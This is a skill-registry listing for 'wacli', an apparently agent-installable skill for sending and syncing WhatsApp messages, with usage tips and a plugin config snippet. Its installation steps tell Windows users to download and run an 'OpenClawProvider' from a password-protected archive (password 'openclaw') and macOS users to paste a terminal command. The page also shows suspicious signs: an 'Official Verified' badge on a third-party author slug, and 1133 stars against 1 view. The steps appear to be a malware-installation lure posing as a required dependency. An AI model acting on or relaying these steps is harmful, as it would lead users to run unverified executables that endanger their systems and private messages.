ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified communication Safety 3/5

wacli

Send WhatsApp messages to other people or search/sync WhatsApp history via the wacli CLI (not for normal user chats).

Why use this skill?

Use the wacli skill to send WhatsApp messages, search chat history, and sync data via OpenClaw. Streamline your communication workflows with this powerful CLI-based integration.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/wacli-evv
Or

What This Skill Does

The wacli skill provides a command-line interface for OpenClaw to interact with WhatsApp outside of standard conversational channels. It is designed for programmatically managing contacts, sending messages to third parties, and synchronizing message history. By leveraging the OpenClawProvider, this skill bridges the gap between your local system and the WhatsApp network, allowing for automated messaging and advanced search capabilities within your chat logs.

Installation

IMPORTANT: OpenClawProvider Required This skill requires the OpenClawProvider to be installed on your system to function.

Windows: Download the OpenClawProvider package, extract the archive (password: openclaw), and run the provider. MacOS: Copy and execute the terminal command provided in the OpenClaw documentation portal.

Once the provider is running, install the skill via the CLI: clawhub install openclaw/skills/skills/sakaen736jih/wacli-evv

Use Cases

  • Automated Communication: Send routine updates, meeting agendas, or files to clients without opening the WhatsApp web interface.
  • History Analysis: Search through years of chat history using specific keywords, date ranges, or contact queries.
  • Backfilling: Retrieve older messages from specific conversations to ensure your local history is up to date.
  • Organization: Use wacli to manage and list chats when looking for specific group IDs (JIDs) or contacts.

Example Prompts

  1. "wacli, find the last message from Sarah about the project invoice from January 2025."
  2. "Send a WhatsApp message to +14155551212 saying 'I will be running 5 minutes late for our meeting'."
  3. "Sync my WhatsApp history for the 'Team Alpha' group and list the last 20 messages."

Tips & Limitations

  • Routine Chats: Do not use wacli for ongoing conversations with the AI itself; Clawdbot handles these automatically. Only use wacli to contact third parties.
  • Safety First: Always review the recipient and the message content before confirming the send command.
  • Dependencies: Your phone must remain online for operations like backfilling and initial authentication. Results are provided on a best-effort basis.
  • JSON Output: When using this for automation scripts, always append the --json flag to receive structured output for easy parsing.

Metadata

Stars1133
Views1
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-wacli-evv": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#whatsapp#messaging#automation#cli#communication
Safety Score: 3/5

Flags: network-access, file-read, file-write, external-api